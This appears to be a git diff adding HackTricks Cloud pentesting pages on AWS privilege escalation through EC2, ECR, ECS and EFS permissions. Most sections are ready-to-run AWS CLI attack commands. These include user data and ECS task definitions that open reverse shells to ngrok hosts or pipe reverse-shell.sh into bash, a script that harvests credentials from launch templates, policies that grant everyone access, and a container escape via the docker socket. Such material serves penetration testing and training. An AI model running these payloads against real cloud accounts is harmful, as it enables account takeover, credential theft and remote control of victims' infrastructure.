+   --launch-specification "{\"IamInstanceProfile\":{\"Name\":\"EC2-CloudWatch-Agent-Role\"}, \"InstanceType\": \"t2.micro\", \"UserData\":\"$REV\", \"ImageId\": \"ami-0c1bc246476a5572b\"}"
+```
+{% endcode %}
+
+### `ec2:ModifyInstanceAttribute`
+
+An attacker with the **`ec2:ModifyInstanceAttribute`** can modify the instances attributes. Among them, he can **change the user data**, which implies that he can make the instance **run arbitrary data.** Which can be used to get a **rev shell to the EC2 instance**.
+
+Note that the attributes can only be **modified while the instance is stopped**, so the **permissions** **`ec2:StopInstances`** and **`ec2:StartInstances`**.
+
+```bash
+TEXT='Content-Type: multipart/mixed; boundary="//"
+MIME-Version: 1.0
+
+--//
+Content-Type: text/cloud-config; charset="us-ascii"
+MIME-Version: 1.0
+Content-Transfer-Encoding: 7bit
+Content-Disposition: attachment; filename="cloud-config.txt"
+
+#cloud-config
+cloud_final_modules:
+- [scripts-user, always]
+
+--//
+Content-Type: text/x-shellscript; charset="us-ascii"
+MIME-Version: 1.0
+Content-Transfer-Encoding: 7bit
+Content-Disposition: attachment; filename="userdata.txt"
+
+#!/bin/bash
+bash -i >& /dev/tcp/2.tcp.ngrok.io/14510 0>&1
+--//'
+TEXT_PATH="/tmp/text.b64.txt"
+
+printf $TEXT | base64 > "$TEXT_PATH"
+
+aws ec2 stop-instances --instance-ids $INSTANCE_ID
+
+aws ec2 modify-instance-attribute \
+    --instance-id="$INSTANCE_ID" \
+    --attribute userData \
+    --value file://$TEXT_PATH
+
+aws ec2 start-instances --instance-ids $INSTANCE_ID
+```
+
+**Potential Impact:** Direct privesc to any EC2 IAM Role attached to a created instance.
+
+### `ec2:CreateLaunchTemplateVersion`,`ec2:CreateLaunchTemplate`,`ec2:ModifyLaunchTemplate`
+
+An attacker with the permissions **`ec2:CreateLaunchTemplateVersion`,`ec2:CreateLaunchTemplate`and `ec2:ModifyLaunchTemplate`** can create a **new Launch Template version** with a **rev shell in** the **user data** and **any EC2 IAM Role on it**, change the default version, and **any Autoscaler group** **using** that **Launch Templat**e that is **configured** to use the **latest** or the **default version** will **re-run the instances** using that template and will execute the rev shell.
+
+{% code overflow="wrap" %}
+```bash
+REV=$(printf '#!/bin/bash
+curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash
+' | base64)
+
+aws ec2 create-launch-template-version \
+   --launch-template-name bad_template \
+   --launch-template-data "{\"ImageId\": \"ami-0c1bc246476a5572b\", \"InstanceType\": \"t3.micro\", \"IamInstanceProfile\": {\"Name\": \"ecsInstanceRole\"}, \"UserData\": \"$REV\"}"
+
+aws ec2 modify-launch-template \
+   --launch-template-name bad_template \
+   --default-version 2
+```
+{% endcode %}
+
+**Potential Impact:** Direct privesc to a different EC2 role.
+
+### `autoscaling:CreateLaunchConfiguration`, `autoscaling:CreateAutoScalingGroup`, `iam:PassRole`
+
+An attacker with the permissions **`autoscaling:CreateLaunchConfiguration`,`autoscaling:CreateAutoScalingGroup`,`iam:PassRole`** can **create a Launch Configuration** with an **IAM Role** and a **rev shell** inside the **user data**, then **create an autoscaling group** from that config and wait for the rev shell to **steal the IAM Role**.
+
+```bash
+aws --profile "$NON_PRIV_PROFILE_USER" autoscaling create-launch-configuration \
+   --launch-configuration-name bad_config \
+   --image-id ami-0c1bc246476a5572b \
+   --instance-type t3.micro \
+   --iam-instance-profile EC2-CloudWatch-Agent-Role \
+   --user-data "$REV"
+
+aws --profile "$NON_PRIV_PROFILE_USER" autoscaling create-auto-scaling-group \
+   --auto-scaling-group-name bad_auto \
+   --min-size 1 --max-size 1 \
+   --launch-configuration-name bad_config \
+   --desired-capacity 1 \
+   --vpc-zone-identifier "subnet-e282f9b8"
+```
+
+**Potential Impact:** Direct privesc to a different EC2 role.
+
+### `!autoscaling`
+
+The set of permissions **`ec2:CreateLaunchTemplate`** and **`autoscaling:CreateAutoScalingGroup`** **aren't enough to escalate** privileges to an IAM role because in order to attach the role specified in the Launch Configuration or in the Launch Template **you need to permissions `iam:PassRole`and `ec2:RunInstances`** (which is a known privesc).
+
+### `ec2-instance-connect:SendSSHPublicKey`
+
+An attacker with the permission **`ec2-instance-connect:SendSSHPublicKey`** can add an ssh key to a user and use it to access it (if he has ssh access to the instance) or to escalate privileges.
+
+```bash
+aws ec2-instance-connect send-ssh-public-key \
+   --instance-id "$INSTANCE_ID" \
+   --instance-os-user "ec2-user" \
+   --ssh-public-key "file://$PUBK_PATH"
+```
+
+**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances.
+
+### `ec2-instance-connect:SendSerialConsoleSSHPublicKey`
+
+An attacker with the permission **`ec2-instance-connect:SendSerialConsoleSSHPublicKey`** can **add an ssh key to a serial connection**. If the serial is not enable, the attacker needs the permission **`ec2:EnableSerialConsoleAccess` to enable it**.
+
+In order to connect to the serial port you also **need to know the username and password of a user** inside the machine.
+
+{% code overflow="wrap" %}
+```bash
+aws ec2 enable-serial-console-access
+
+aws ec2-instance-connect send-serial-console-ssh-public-key \
+   --instance-id "$INSTANCE_ID" \
+   --serial-port 0 \
+   --region "eu-west-1" \
+   --ssh-public-key "file://$PUBK_PATH"
+
+ssh -i /tmp/priv $INSTANCE_ID.port0@serial-console.ec2-instance-connect.eu-west-1.aws
+```
+{% endcode %}
+
+This way isn't that useful to privesc as you need to know a username and password to exploit it.
+
+**Potential Impact:** (Highly unprovable) Direct privesc to the EC2 IAM roles attached to running instances.
+
+### `describe-launch-templates`,`describe-launch-template-versions`
+
+Since launch templates have versioning, an attacker with **`ec2:describe-launch-templates`** and **`ec2:describe-launch-template-versions`** permissions could exploit these to discover sensitive information, such as credentials present in user data. To accomplish this, the following script loops through all versions of the available launch templates:
+
+{% code overflow="wrap" %}
+```bash
+for i in $(aws ec2 describe-launch-templates --region us-east-1 | jq -r '.LaunchTemplates[].LaunchTemplateId')
+do
+  echo "[*] Analyzing $i"
+  aws ec2 describe-launch-template-versions --launch-template-id $i --region us-east-1 | jq -r '.LaunchTemplateVersions[] | "\(.VersionNumber) \(.LaunchTemplateData.UserData)"' | while read version userdata
+  do
+    echo "VersionNumber: $version"
+    echo "$userdata" | base64 -d
+    echo
+  done | grep -iE "aws_|password|token|api"
+done
+```
+{% endcode %}
+
+In the above commands, although we're specifying certain patterns (`aws_|password|token|api`), you can use a different regex to search for other types of sensitive information.
+
+Assuming we find `aws_access_key_id` and `aws_secret_access_key`, we can use these credentials to authenticate to AWS.
+
+**Potential Impact:** Direct privilege escalation to IAM user(s).
+
+## References
+
+* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md
new file mode 100644
index 0000000000..9a84a0d29f
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md
@@ -0,0 +1,136 @@
+# AWS - ECR Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## ECR
+
+### `ecr:GetAuthorizationToken`,`ecr:BatchGetImage`
+
+An attacker with the **`ecr:GetAuthorizationToken`** and **`ecr:BatchGetImage`** can login to ECR and download images.
+
+For more info on how to download images:
+
+{% content-ref url="../aws-post-exploitation/aws-ecr-post-exploitation.md" %}
+[aws-ecr-post-exploitation.md](../aws-post-exploitation/aws-ecr-post-exploitation.md)
+{% endcontent-ref %}
+
+**Potential Impact:** Indirect privesc by intercepting sensitive information in the traffic.
+
+### `ecr:GetAuthorizationToken`, `ecr:BatchCheckLayerAvailability`, `ecr:CompleteLayerUpload`, `ecr:InitiateLayerUpload`, `ecr:PutImage`, `ecr:UploadLayerPart`
+
+An attacker with the all those permissions **can login to ECR and upload images**. This can be useful to escalate privileges to other environments where those images are being used.
+
+To learn how to upload a new image/update one, check:
+
+{% content-ref url="../aws-services/aws-eks-enum.md" %}
+[aws-eks-enum.md](../aws-services/aws-eks-enum.md)
+{% endcontent-ref %}
+
+### `ecr-public:GetAuthorizationToken`, `ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload`, `ecr-public:InitiateLayerUpload, ecr-public:PutImage`, `ecr-public:UploadLayerPart`
+
+Like the previous section, but for public repositories.
+
+### `ecr:SetRepositoryPolicy`
+
+An attacker with this permission could **change** the **repository** **policy** to grant himself (or even everyone) **read/write access**.\
+For example, in this example read access is given to everyone.
+
+```bash
+aws ecr set-repository-policy \
+    --repository-name <repo_name> \
+    --policy-text file://my-policy.json
+```
+
+Contents of `my-policy.json`:
+
+```json
+{
+    "Version" : "2008-10-17",
+    "Statement" : [
+        {
+            "Sid" : "allow public pull",
+            "Effect" : "Allow",
+            "Principal" : "*",
+            "Action" : [
+                "ecr:BatchCheckLayerAvailability",
+                "ecr:BatchGetImage",
+                "ecr:GetDownloadUrlForLayer"
+            ]
+        }
+    ]
+}
+```
+
+### `ecr-public:SetRepositoryPolicy`
+
+Like the previoous section, but for public repositories.\
+An attacker can **modify the repository policy** of an ECR Public repository to grant unauthorized public access or to escalate their privileges.
+
+{% code overflow="wrap" %}
+```bash
+bashCopy code# Create a JSON file with the malicious public repository policy
+echo '{
+  "Version": "2008-10-17",
+  "Statement": [
+    {
+      "Sid": "MaliciousPublicRepoPolicy",
+      "Effect": "Allow",
+      "Principal": "*",
+      "Action": [
+        "ecr-public:GetDownloadUrlForLayer",
+        "ecr-public:BatchGetImage",
+        "ecr-public:BatchCheckLayerAvailability",
+        "ecr-public:PutImage",
+        "ecr-public:InitiateLayerUpload",
+        "ecr-public:UploadLayerPart",
+        "ecr-public:CompleteLayerUpload",
+        "ecr-public:DeleteRepositoryPolicy"
+      ]
+    }
+  ]
+}' > malicious_public_repo_policy.json
+
+# Apply the malicious public repository policy to the ECR Public repository
+aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json
+```
+{% endcode %}
+
+**Potential Impact**: Unauthorized public access to the ECR Public repository, allowing any user to push, pull, or delete images.
+
+### `ecr:PutRegistryPolicy`
+
+An attacker with this permission could **change** the **registry policy** to grant himself, his account (or even everyone) **read/write access**.
+
+```bash
+aws ecr set-repository-policy \
+    --repository-name <repo_name> \
+    --policy-text file://my-policy.json
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md
new file mode 100644
index 0000000000..793ce44c2c
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md
@@ -0,0 +1,280 @@
+# AWS - ECS Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## ECS
+
+More **info about ECS** in:
+
+{% content-ref url="../aws-services/aws-ecs-enum.md" %}
+[aws-ecs-enum.md](../aws-services/aws-ecs-enum.md)
+{% endcontent-ref %}
+
+### `iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:RunTask`
+
+An attacker abusing the `iam:PassRole`, `ecs:RegisterTaskDefinition` and `ecs:RunTask` permission in ECS can **generate a new task definition** with a **malicious container** that steals the metadata credentials and **run it**.
+
+```bash
+# Generate task definition with rev shell
+aws ecs register-task-definition --family iam_exfiltration \
+    --task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
+    --network-mode "awsvpc" \
+    --cpu 256 --memory 512\
+    --requires-compatibilities "[\"FARGATE\"]" \
+    --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"
+
+# Run task definition
+aws ecs run-task --task-definition iam_exfiltration \
+    --cluster arn:aws:ecs:eu-west-1:947247140022:cluster/API \
+    --launch-type FARGATE \
+    --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"subnet-e282f9b8\"]}}"
+
+# Delete task definition
+## You need to remove all the versions (:1 is enough if you just created one)
+aws ecs deregister-task-definition --task-definition iam_exfiltration:1
+```
+
+**Potential Impact:** Direct privesc to a different ECS role.
+
+### `iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:StartTask`
+
+Just like in the previous example an attacker abusing the **`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:StartTask`** permissions in ECS can **generate a new task definition** with a **malicious container** that steals the metadata credentials and **run it**.\
+However, in this case, a container instance to run the malicious task definition need to be.
+
+```bash
+# Generate task definition with rev shell
+aws ecs register-task-definition --family iam_exfiltration \
+    --task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
+    --network-mode "awsvpc" \
+    --cpu 256 --memory 512\
+    --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"
+
+aws ecs start-task --task-definition iam_exfiltration \
+    --container-instances <instance_id>
+
+# Delete task definition
+## You need to remove all the versions (:1 is enough if you just created one)
+aws ecs deregister-task-definition --task-definition iam_exfiltration:1
+```
+
+**Potential Impact:** Direct privesc to any ECS role.
+
+### `iam:PassRole`, `ecs:RegisterTaskDefinition`, (`ecs:UpdateService|ecs:CreateService)`
+
+Just like in the previous example an attacker abusing the **`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:UpdateService`** or **`ecs:CreateService`** permissions in ECS can **generate a new task definition** with a **malicious container** that steals the metadata credentials and **run it by creating a new service with at least 1 task running.**
+
+```bash
+# Generate task definition with rev shell
+aws ecs register-task-definition --family iam_exfiltration \
+    --task-role-arn  "$ECS_ROLE_ARN" \
+    --network-mode "awsvpc" \
+    --cpu 256 --memory 512\
+    --requires-compatibilities "[\"FARGATE\"]" \
+    --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/8.tcp.ngrok.io/12378 0>&1\\\"\"]}]"
+
+# Run the task creating a service
+aws ecs create-service --service-name exfiltration \
+    --task-definition iam_exfiltration \
+    --desired-count 1 \
+    --cluster "$CLUSTER_ARN" \
+    --launch-type FARGATE \
+    --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"$SUBNET\"]}}"
+
+# Run the task updating a service
+aws ecs update-service --cluster <CLUSTER NAME> \
+    --service <SERVICE NAME> \
+    --task-definition <NEW TASK DEFINITION NAME>
+```
+
+**Potential Impact:** Direct privesc to any ECS role.
+
+### `iam:PassRole`, (`ecs:UpdateService|ecs:CreateService)`
+
+Actually, just with those permissions it's possible to use overrides to executer arbitrary commands in a container with an arbitrary role with something like:
+
+{% code overflow="wrap" %}
+```bash
+aws ecs run-task \
+    --task-definition "<task-name>" \
+    --overrides '{"taskRoleArn":"<role-arn>", "containerOverrides":[{"name":"<container-name-in-task>","command":["/bin/bash","-c","curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh"]}]}' \
+    --cluster <cluster-name> \
+    --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"DISABLED\", \"subnets\":[\"<subnet-name>\"]}}"
+```
+{% endcode %}
+
+**Potential Impact:** Direct privesc to any ECS role.
+
+### `ecs:RegisterTaskDefinition`, **`(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)`**
+
+This scenario is like the previous ones but **without** the **`iam:PassRole`** permission.\
+This is still interesting because if you can run an arbitrary container, even if it's without a role, you could **run a privileged container to escape** to the node and **steal the EC2 IAM role** and the **other ECS containers roles** running in the node.\
+You could even **force other tasks to run inside the EC2 instance** you compromise to steal their credentials (as discussed in the [**Privesc to node section**](aws-ecs-privesc.md#privesc-to-node)).
+
+{% hint style="warning" %}
+This attack is only possible if the **ECS cluster is using EC2** instances and not Fargate.
+{% endhint %}
+
+```bash
+printf '[
+    {
+        "name":"exfil_creds",
+        "image":"python:latest",
+        "entryPoint":["sh", "-c"],
+        "command":["/bin/bash -c \\\"bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/12976 0>&1\\\""],
+        "mountPoints": [
+            {
+                "readOnly": false,
+                "containerPath": "/var/run/docker.sock",
+                "sourceVolume": "docker-socket"
+            }
+        ]
+    }
+]' > /tmp/task.json
+
+printf '[
+    {
+        "name": "docker-socket",
+        "host": {
+            "sourcePath": "/var/run/docker.sock"
+        }
+    }
+]' > /tmp/volumes.json
+
+
+aws ecs register-task-definition --family iam_exfiltration \
+    --cpu 256 --memory 512 \
+    --requires-compatibilities '["EC2"]' \
+    --container-definitions file:///tmp/task.json \
+    --volumes file:///tmp/volumes.json
+
+
+aws ecs run-task --task-definition iam_exfiltration \
+    --cluster arn:aws:ecs:us-east-1:947247140022:cluster/ecs-takeover-ecs_takeover_cgidc6fgpq6rpg-cluster \
+    --launch-type EC2
+
+# You will need to do 'apt update' and 'apt install docker.io' to install docker in the rev shell
+```
+
+### `ecs:ExecuteCommand`, `ecs:DescribeTasks,`**`(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)`**
+
+An attacker with the **`ecs:ExecuteCommand`, `ecs:DescribeTasks`** can **execute commands** inside a running container and exfiltrate the IAM role attached to it (you need the describe permissions because it's necessary to run `aws ecs execute-command`).\
+However, in order to do that, the container instance need to be running the **ExecuteCommand agent** (which by default isn't).
+
+Therefore, the attacker cloud try to:
+
+* **Try to run a command** in every running container
+
+```bash
+# List enableExecuteCommand on each task
+for cluster in $(aws ecs list-clusters | jq .clusterArns | grep '"' | cut -d '"' -f2); do
+   echo "Cluster $cluster"
+   for task in $(aws ecs list-tasks --cluster "$cluster" | jq .taskArns | grep '"' | cut -d '"' -f2); do
+      echo "  Task $task"
+      # If true, it's your lucky day
+      aws ecs describe-tasks --cluster "$cluster" --tasks "$task" | grep enableExecuteCommand
+   done
+done
+
+# Execute a shell in a container
+aws ecs execute-command --interactive \
+   --command "sh" \
+   --cluster "$CLUSTER_ARN" \
+   --task "$TASK_ARN"
+```
+
+* If he has **`ecs:RunTask`**, run a task with `aws ecs run-task --enable-execute-command [...]`
+* If he has **`ecs:StartTask`**, run a task with `aws ecs start-task --enable-execute-command [...]`
+* If he has **`ecs:CreateService`**, create a service with `aws ecs create-service --enable-execute-command [...]`
+* If he has **`ecs:UpdateService`**, update a service with `aws ecs update-service --enable-execute-command [...]`
+
+You can find **examples of those options** in **previous ECS privesc sections**.
+
+**Potential Impact:** Privesc to a different role attached to containers.
+
+### `ssm:StartSession`
+
+Check in the **ssm privesc page** how you can abuse this permission to **privesc to ECS**:
+
+{% content-ref url="aws-ssm-privesc.md" %}
+[aws-ssm-privesc.md](aws-ssm-privesc.md)
+{% endcontent-ref %}
+
+### `iam:PassRole`, `ec2:RunInstances`
+
+Check in the **ec2 privesc page** how you can abuse these permissions to **privesc to ECS**:
+
+{% content-ref url="aws-ec2-privesc.md" %}
+[aws-ec2-privesc.md](aws-ec2-privesc.md)
+{% endcontent-ref %}
+
+### `?ecs:RegisterContainerInstance`
+
+TODO: Is it possible to register an instance from a different AWS account so tasks are run under machines controlled by the attacker??
+
+### `ecs:CreateTaskSet`, `ecs:UpdateServicePrimaryTaskSet`, `ecs:DescribeTaskSets`
+
+{% hint style="info" %}
+TODO: Test this
+{% endhint %}
+
+An attacker with the permissions `ecs:CreateTaskSet`, `ecs:UpdateServicePrimaryTaskSet`, and `ecs:DescribeTaskSets` can **create a malicious task set for an existing ECS service and update the primary task set**. This allows the attacker to **execute arbitrary code within the service**.
+
+```bash
+bashCopy code# Register a task definition with a reverse shell
+echo '{
+  "family": "malicious-task",
+  "containerDefinitions": [
+    {
+      "name": "malicious-container",
+      "image": "alpine",
+      "command": [
+        "sh",
+        "-c",
+        "apk add --update curl && curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | sh"
+      ]
+    }
+  ]
+}' > malicious-task-definition.json
+
+aws ecs register-task-definition --cli-input-json file://malicious-task-definition.json
+
+# Create a malicious task set for the existing service
+aws ecs create-task-set --cluster existing-cluster --service existing-service --task-definition malicious-task --network-configuration "awsvpcConfiguration={subnets=[subnet-0e2b3f6c],securityGroups=[sg-0f9a6a76],assignPublicIp=ENABLED}"
+
+# Update the primary task set for the service
+aws ecs update-service-primary-task-set --cluster existing-cluster --service existing-service --primary-task-set arn:aws:ecs:region:123456789012:task-set/existing-cluster/existing-service/malicious-task-set-id
+```
+
+**Potential Impact**: Execute arbitrary code in the affected service, potentially impacting its functionality or exfiltrating sensitive data.
+
+## References
+
+* [https://ruse.tech/blogs/ecs-attack-methods](https://ruse.tech/blogs/ecs-attack-methods)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md
new file mode 100644
index 0000000000..566ce8d052
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md
@@ -0,0 +1,122 @@
+# AWS - EFS Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## EFS
+
+More **info about EFS** in:
+
+{% content-ref url="../aws-services/aws-efs-enum.md" %}
+[aws-efs-enum.md](../aws-services/aws-efs-enum.md)
+{% endcontent-ref %}
+
+Remember that in order to mount an EFS you need to be in a subnetwork where the EFS is exposed and have access to it (security groups). Is this is happening, by default, you will always be able to mount it, however, if it's protected by IAM policies you need to have the extra permissions mentioned here to access it.
+
+### `elasticfilesystem:DeleteFileSystemPolicy`|`elasticfilesystem:PutFileSystemPolicy`
+
+With any of those permissions an attacker can **change the file system policy** to **give you access** to it, or to just **delete it** so the **default access** is granted.
+
+To delete the policy:
+
+```bash
+aws efs delete-file-system-policy \
+    --file-system-id <value>
+```
+
+To change it:
+
+```json
+aws efs put-file-system-policy --file-system-id <fs-id> --policy file:///tmp/policy.json
+
+// Give everyone trying to mount it read, write and root access
+// policy.json: 
+{
+    "Version": "2012-10-17",
+    "Id": "efs-policy-wizard-059944c6-35e7-4ba0-8e40-6f05302d5763",
+    "Statement": [
+        {
+            "Sid": "efs-statement-2161b2bd-7c59-49d7-9fee-6ea8903e6603",
+            "Effect": "Allow",
+            "Principal": {
+                "AWS": "*"
+            },
+            "Action": [
+	       "elasticfilesystem:ClientRootAccess",
+               "elasticfilesystem:ClientWrite",
+               "elasticfilesystem:ClientMount"
+            ],
+            "Condition": {
+                "Bool": {
+                    "elasticfilesystem:AccessedViaMountTarget": "true"
+                }
+            }
+        }
+    ]
+}
+```
+
+### `elasticfilesystem:ClientMount|(elasticfilesystem:ClientRootAccess)|(elasticfilesystem:ClientWrite)`
+
+With this permission an attacker will be able to **mount the EFS**. If the write permission is not given by default to everyone that can mount the EFS, he will have only **read access**.
+
+```bash
+sudo mkdir /efs
+sudo mount -t efs -o tls,iam  <file-system-id/EFS DNS name>:/ /efs/
+```
+
